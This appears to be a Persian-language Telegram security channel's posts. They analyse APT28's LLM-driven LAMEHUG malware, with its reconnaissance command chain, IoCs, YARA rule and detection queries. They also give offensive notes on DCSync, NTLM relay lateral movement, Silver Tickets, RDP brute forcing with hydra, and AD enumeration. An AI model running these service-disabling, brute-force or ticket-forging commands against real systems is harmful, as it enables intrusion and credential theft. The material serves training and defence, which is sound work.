💢 روز "بازگشایی آموزشگاها"

این روز خجسته را به همه‌ی مردم ايران بزرگ شادباش می‌گویم.
به ویژه خانواده‌هایی که دانش آموز از پایه يکم دبستان تا آموزشگاهای بزرگ کشور را دارند.
آرزوی آبرومندی ‌و رسیدن به برترین پایه‌های دانشیک و بهترین‌ ها را  آرزو داریم براتون.

APT28 LAMEHUG
اولین بدافزار مجهز به هوش مصنوعی در طبیعت

گروه هکری روس APT28 (Forest Blizzard, UAC-0001) با توسعه اولین بدافزار عمومی مستندشده که از یک مدل زبانی بزرگ (LLM) بهره می‌ برد، دوره جدیدی از حملات سایبری را معرفی کرده است. LAMEHUG فصل جدیدی در تاریخ بدافزارها گشوده است.

معماری فنی

اجزای اصلی:
- زبان برنامه‌نویسی: پایتون
- بسته‌بندی: PyInstaller (فایل‌های .pif)
- مدل زبانی: Qwen 2.5-Coder-32B-Instruct
- رابط برنامه‌نویسی (API): Hugging Face Inference API
- روش تحویل: ایمیل‌های فیشینگ حاوی فایل‌های ZIP

رویکرد انقلابی:
LAMEHUG
دستورات متنی به زبان طبیعی را دریافت کرده و از طریق مدل زبانی آن‌ ها را به دستورات سیستمی تبدیل می‌ کند که روی دستگاه آلوده اجرا می‌ شوند. این قابلیت امکان خودکارسازی وظایف پیچیده جاسوسی و سرقت داده‌ها را بدون نیاز به برنامه‌نویسی دستورات خاص فراهم می‌کند.

مکانیزم عملکرد

مرحله ۱: آلودگی

Appendix.pdf.zip → Appendix.pdf.pif → PyInstaller executable 

مرحله ۲: تولید دستورات توسط هوش مصنوعی
بدافزار درخواست‌هایی را به Qwen 2.5-Coder از طریق API Hugging Face ارسال می‌کند:
"تولید دستورات ویندوز برای جمع‌وآوری اطلاعات سیستمی شامل سخت‌افزار، پروسس ها، سرویس‌ ها و پیکربندی شبکه"

مرحله ۳: اجرای دستورات تولید شده
مدل زبانی دستورات آماده را باز می‌ گرداند و LAMEHUG آن‌ ها را از طریق cmd.exe اجرا می‌کند:

cmd.exe /c "mkdir %PROGRAMDATA%\info && 
systeminfo >> %PROGRAMDATA%\info\info.txt && 
wmic computersystem get name,manufacturer,model >> %PROGRAMDATA%\info\info.txt && 
wmic cpu get name,speed >> %PROGRAMDATA%\info\info.txt && 
wmic memorychip get capacity,speed >> %PROGRAMDATA%\info\info.txt && 
wmic diskdrive get model,size >> %PROGRAMDATA%\info\info.txt && 
wmic nic get name,macaddress,ipaddress >> %PROGRAMDATA%\info\info.txt && 
tasklist >> %PROGRAMDATA%\info\info.txt && 
net start >> %PROGRAMDATA%\info\info.txt && 
ipconfig /all >> %PROGRAMDATA%\info\info.txt && 
whoami /user >> %PROGRAMDATA%\info\info.txt && 
whoami /groups >> %PROGRAMDATA%\info\info.txt && 
net config workstation >> %PROGRAMDATA%\info\info.txt && 
dsquery user -samid %username% >> %PROGRAMDATA%\info\info.txt"

مرحله ۴: جمع‌ آوری و استخراج داده‌ ها
- جستجوی بازگشتی در پوشه‌ های Documents، Desktop، Downloads
- آماده‌ سازی فایل‌ ها برای استخراج
- انتقال داده‌ ها از طریق SFTP یا HTTP POST.

گونه‌های بدافزار

سه نسخه شناسایی شده است:

1. نسخه اصلی (Appendix.pdf.pif)
- قابلیت پایه تولید دستورات توسط هوش مصنوعی
- جمع‌آوری اطلاعات سیستمی
- استخراج داده‌ها از طریق SFTP

2.AI_generator_uncensored_Canvas_PRO_v0.9.exe
- قابلیت‌های پیشرفته‌ تر تولید دستورات
- روش‌ های جایگزین استخراج داده
- دور زدن محدودیت‌ های مدل زبانی

3. image.py
- نسخه اسکریپت پایتون
- منطق تغییر یافته برای استخراج
- احتمالاً نسخه آزمایشی

شاخص‌ های فنی

آرتیفکت‌ های فایل:
- %PROGRAMDATA%\info\info.txt 
- اطلاعات سیستمی
- Appendix.pdf.pif 
پیلود اصلی
- AI_generator_uncensored_Canvas_PRO_v0.9.exe

- نسخه جایگزین

شاخص‌ های شبکه‌ای:

- سرورهای C2: 144.126.202.227, 192.36.27.37
- دامنه‌ها:
boroda70@meta.ua, stayathomeclasses.com

- API: inference.huggingface.co (Qwen 2.5-Coder)

- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0

هش فایل‌ ها:

- 8013b23cb78407675f323d54b6b8dfb2a61fb40fb13309337f5b662dbd812a
- 766c356d6a4b00078a0293460c5967764fcd788da8c1cd1df708695f3a15b777
- a30930dfb655aa39c571c163ada65ba4dec30600df3bf548cc48bedd0e841416
- d6af1c9f5ce407e53ec73c8e7187ed804fb4f80cf8dbd6722fc69e15e135db2e
- bdb33bbb4ea11884b15f67e5c974136e6294aa87459cdc276ac2eea85b1deaa3
- 384e8f3d300205546fb8c9b9224011b3b3cb71adc994180ff55e1e6416f65715

روش‌ های شناسایی

1. نظارت بر فعالیت فایل:

 Sysmon Event ID 11: File creation in %PROGRAMDATA%\info\*
Suspicious files in writable directories: AppData, ProgramData, Users\Public

2. شناسایی جاسوسی:

   - اجرای چندین دستور شناسایی در بازه زمانی کوتاه:
whoami, systeminfo, wmic, ipconfig, net, tasklist

3. نظارت شبکه‌ای:

   - اتصالات به نقاط پایانی API مدل‌های زبانی:
     - inference.huggingface.co
     - api.openai.com
     - generativelanguage.googleapis.com
     - api.anthropic.com`

@KavehOffSec

۴. تحلیل رفتاری:
الگوهای غیرعادی اجرای دستورات
تولید خودکار دستورات سیستمی
جمع‌آوری انبوه اطلاعات سیستمی

اقدامات حفاظتی

اقدامات فوری:
۱. مسدود کردن IoCهای شناخته‌شده (IPها، دامنه‌ها، هش‌ ها)
۲. نظارت بر دسترسی‌ ها به API LLM
۳. تقویت کنترل پیوست‌ های ایمیل
۴. بررسی دایرکتوری %PROGRAMDATA%\info\

اقدامات بلندمدت:

# مسدود کردن API LLM (اگر به طور قانونی استفاده نشود)
netsh advfirewall firewall add rule name="Block_LLM_APIs" 
dir=out action=block remoteip=inference.huggingface.co

نظارت بر پروسس های مشکوک

wevtutil qe Security /q:"*[System[EventID=4688] and 
EventData[Data[@Name='NewProcessName'] and 
(contains(.,'wmic') or contains(.,'systeminfo'))]]"

قوانین YARA برای شناسایی:

rule LAMEHUG_AI_Malware {
    meta:
        denoscription = "شناسایی بدافزار مبتنی بر هوش مصنوعی LAMEHUG"
        author = "تحقیقات امنیتی"
        date = "2025-07-30"
    
    strings:
        $api1 = "inference.huggingface.co"
        $api2 = "Qwen2.5-Coder"
        $path = "%PROGRAMDATA%\\info\\info.txt"
        $cmd1 = "systeminfo >>"
        $cmd2 = "wmic computersystem"
        
    condition:
        2 of them
}

ارزش برای صنعت

عصر جدیدی از تهدیدها:
LAMEHUG
نشان‌ دهنده تغییری اساسی در توسعه بدافزار است. استفاده از LLM برای تولید پویای دستورات، بدافزار را انطباق‌ پذیرتر و سخت‌ تر برای شناسایی می‌کند.

ریسک‌های کلیدی:
- خودکارسازی حملات پیچیده بدون تخصص
- دور زدن سیگنچرهای استاتیک از طریق تولید پویا
- کاهش موانع ورود برای مجرمان سایبری
- مقیاس‌ پذیری حملات شخصی‌ سازی‌ شده

تکامل حفاظت:
روش‌های شناسایی سنتی مبتنی بر سیگنچرهای استاتیک، کمتر مؤثر می‌شوند. نیاز به گذار به تحلیل رفتاری و نظارت بر فعالیت هوش مصنوعی وجود دارد.

پیش‌بینی‌های توسعه

آینده نزدیک:
- ادغام LLMهای قدرتمندتر (GPT-4، Claude)
- LLMهای محلی برای اجتناب از شاخص‌ های شبکه‌ ای
- تولید کد پلی‌ مورفیک توسط هوش مصنوعی
- مهندسی اجتماعی خودکار

فناوری‌های حفاظتی:
- سیستم‌ های شناسایی مبتنی بر هوش مصنوعی
- تحلیل رفتاری استفاده از هوش مصنوعی
- نظارت و فیلترینگ API LLM
- تکنیک‌ های هوش مصنوعی خصمانه

نتیجه‌گیری

LAMEHUG
آغاز عصر جدیدی در امنیت سایبری است. APT28 نشان داد که چگونه هوش مصنوعی می‌تواند برای ایجاد تهدیدهای پیچیده‌تر و انطباق‌پذیرتر سلاح‌ سازی شود.

نکات بحرانی:
- اولین مورد استفاده جنگی از LLM در بدافزار
- تولید پویای دستورات از طریق هوش مصنوعی
- کاهش موانع فنی برای مهاجمان
- نیاز به بازنگری رویکردهای حفاظتی


#APT28
@KavehOffSec

📖 Credential Dumping DCSync Attack


حمله Active Directory Credential Dumping (DCSync) تکنیکی تخصصی است که مهاجمین برای استخراج اعتبارنامه‌ها از کنترل‌کننده دامنه (DC) به‌کار می‌برند، با این روش که خود را شبیه یک کنترل‌کننده دامنه نشان می‌دهند.


راه‌اندازی یک محیط آزمایشگاهی برای شبیه ‌سازی حمله
درک پروتکل DRS و نحوه عملکرد حمله
چرایی وقوع این misconfiguration در دنیای واقعی
Exploiting از misconfiguration
نگاشت حمله به MITRE ATT&CK
Detecting حمله
استراتژی ‌های کاهش خطر
راه‌اندازی لاب (Lab Setup)

نیازمندی‌ها:
یک محیط مجازی ‌سازی (مثلاً VMware، VirtualBox یا Hyper-V).
یک Windows Server که به‌عنوان کنترل‌کننده دامنه پیکربندی شده باشد.
یک ماشین کلاینت ویندوز.
ابزارها: Impacket، Mimikatz، Netexec و Metasploit.
مراحل:
پیکربندی کنترل‌کننده دامنه:
ویندوز سرور را نصب و پیکربندی کنید تا به‌عنوان کنترل‌کننده دامنه (DC) عمل کند؛ نام دامنه را مثلاً ignite.local قرار دهید و آدرس IP را به‌صورت ایستا (static) تنظیم کنید مثلاً 192.168.1.48. AD را راه‌اندازی کنید و چند کاربر و گروه ایجاد کنید.
@KavehOffSec
@TryHackBox

آماده‌ سازی برای NTLM Relay از راه دور: Lateral Movement بدون NTLM و پورت 445/TCP

این مقاله یک سناریو واقعی از تست نفوذ را نشان می‌دهد که در آن مهاجم پس از دستیابی به دسترسی اولیه به یک سرور،با غیرفعال کردن عمدی سرویس‌ های حیاتی NetLogon، LanManServer و LanManWorkstation، مسیر معمول NTLM Relay از طریق پورت 445 را مسدود می‌ کند.

مراحل دقیق حمله:

1. غیرفعال کردن سرویس‌های حیاتی:

sc stop netlogon
sc stop lanmanserver
sc config lanmanserver start= disabled
sc stop lanmanworkstation
sc config lanmanworkstation start= disabled

2. تأیید بسته بودن پورت 445:

 nmap -p 445 -sT -Pn <serverIP>

3. راه حل جایگزین - استفاده از Kerberos:

■ استخراج هش‌های NTLM از LSA Secrets با secretsdump.py
■ به دست آوردن Domain SID با lookupsid.py
■ ساخت Silver Ticket با ticketer.py

4. دسترسی به سیستم تارگت:
■ استفاده از atexec-pro.py برای اجرای دستور از راه دور
■ آپلود و اجرای پیلود (msf_win_x64.exe)

⚠️ سلب مسئولیت:
این محتوا صرفاً برای اهداف آموزشی و در محیط ‌های لابراتور مجاز ارائه می ‌شود.
@KavehOffSec

🔖 آماده‌ سازی برای NTLM Relay از راه دور: Lateral Movement بدون NTLM و پورت 445/TCP
@KavehOffSec

CVE-2025-59287 (CVSS 9.8)

آسیب‌پذیری بحرانی RCE در WSUS

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59287

@KavehOffSec

RDP بکدور
RDP Shadowing
فعال‌سازی Shadowing RDP
شمارش کاربران فعال
استفاده از shadow mode
سناریوی حمله کامل


@KavehOffSec

منم كوروش، شاه جهان، شاه بزرگ، شاه نيرومند، شاه بابِل، شاه سومر و اَكد، شاه چهار گوشه جهان.

هفتم آبان، روز بزرگداشت کوروش بزرگ است؛ پادشاهی که نه فقط برای ایرانیان، بلکه برای تمام جهان نماد انسانیت، داد و آزادی است.

یادآوری و پاسداشت چنین روزی، یادآوری ریشه‌های تاریخی و فرهنگی ماست؛ یادآوری میراثی که بر پایه خرد، عدالت و احترام به انسان بنا شده است.

امروز اگرچه جامعه ما با چالش‌ها و مشکلات فراوان روبه‌روست، اما نباید بگذاریم این دشواری‌ها، ما را از یادآوری و پاسداشت تاریخ و هویت ایرانی‌مان دور کند.

هفتم آبان بزرگداشت کوروش بزرگ بر تمام ایرانیان همایون باد

🔖 پروتکل ریموت دسکتاپ - تست نفوذ RDP

پروتکل ریموت دکستاپ RDP پروتکلی است که به کاربر یک رابط گرافیکی ارائه می‌ دهد تا از طریق اتصال شبکه به کامپیوتر دیگری متصل شود. پورت پیش‌ فرض آن ۳۳۸۹ است.

Enumeration

nmap --noscript rdp-enum-encryption -p 3389 <target-ip>
nmap --noscript rdp-ntlm-info -p 3389 <target-ip>
nmap --noscript rdp* -p 3389 <target-ip>

Brute Force Credentials

hydra -l username -P passwords.txt <target-ip> rdp
hydra -L usernames.txt -p password <target-ip> rdp

Connect
Remmina

Remmina :
یک کلاینت ریپوت دکستاپ برای سیستم‌ عامل‌ های کامپیوتری مبتنی بر POSIX است..


remmina :

# -c: Connect given URI or file
remmina -c rdp://username@vulnerable.com
remmina -c rdp://domain\\username@vulnerable.com
remmina -c rdp://username:password@vulnerable.com

# ---------------------------------------------------------------------------------

# Settings

# Keyboard mapping
1. On Remmina client window, click menu icon and move to "Preferences".
2. Navigate to "RDP" tab and check "Use client keyboard mapping".
3. Reboot Remmina

FreeRDP

xfreerdp /u:username /v:10.0.0.1:3389
xfreerdp /u:username /p:password /cert:ignore /v:10.0.0.1 /workarea
# Create a shared drive (/drive:LOCAL_DIR,SHARE_NAME)
xfreerdp /u:username /p:password /drive:.,share /v:10.0.0.1
# Useful command for exploiting
xfreerdp /v:10.0.0.1 /u:username /p:password +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share

# --------------------------------------------------------------------------------

# On remote Windows

# Access share directory in Command Prompt or PowerShell
\\tsclient\\~share\

Rdesktop

rdesktop -u username -p password 10.0.0.1:3389

#RDP
@KavehOffSec

کاربرد کامندهای شبکه لینوکس در عملیات Red Teaming(از کتاب Red Team Guide) هر کامند زیر رو با تمرکز بر کاربرد عملی در فازهای استاندارد MITRE ATT&CK توضیح دادم. این توضیحات کمک میکنن بفهمید هر ابزار چطور توی عملیات واقعی تست نفوذ کمک میکنه.


کامندها بر اساس کتاب

توضیحات: تحلیل شخصی + تجربهٔ عملیاتی

مطالعه در توییتر

تست نفوذ Active Directory - بخش اول

اکتیودایرکتوری (AD) یک سرویس دایرکتوری است که توسط مایکروسافت برای شبکه‌های دامینی ویندوز توسعه داده شده است.

شناسایی (Enumeration)
کشف Domain Controllerها

dig @<target-ip> example.local ANY
gobuster dns -d example.local -w subdomains.txt -t 25

شمارش یا enum با BloodHound
1. اجرای BloodHound
ما از BloodHound Community Edition استفاده می‌کنیم.

دستور زیر Docker Compose مربوط به BloodHound را اجرا می‌کند:

curl -L https://ghst.ly/getbhce > docker-compose.yml
sudo docker-compose down -v # اگر می‌خواهید پسورد BloodHound را ریست کنید
sudo docker-compose pull && sudo docker-compose up

بعد از اجرا، رابط وب از طریق مرورگر و آدرس زیر در دسترس است:

http://localhost:8080

با نام کاربری admin و پسوردی که هنگام اجرای دستور در لاگ نمایش داده میشود لاگین کنید.

برای مشخص کردن IP و پورت دلخواه، متغیرهای محیطی زیر را روی ماشین اتک تنظیم کنید:

export BLOODHOUND_HOST=10.0.0.1
export BLOODHOUND_PORT=8090

ادامه دارد ...
#AD
@KavehOffSec